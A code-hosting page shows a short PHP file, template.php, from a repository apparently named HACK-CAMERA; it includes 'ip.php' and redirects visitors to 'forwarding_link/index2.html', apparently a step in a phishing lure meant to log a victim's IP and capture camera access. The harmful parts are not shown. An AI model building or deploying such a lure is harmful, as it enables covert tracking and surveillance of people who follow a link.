Book a Demo!
Store
Features
Docs
Share
Support
News
About
Policies
Sign Up
Sign In
hackerxphantom
Edit Copy
Star
GitHub Repository:
hackerxphantom/HACK-CAMERA
Path:
blob/Master/jio/template.php
1
3
1
views
1
<?php
2
include
'ip.php'
;
3
header
(
'Location: forwarding_link/index2.html'
)
;
4
exit
5
?>
6
7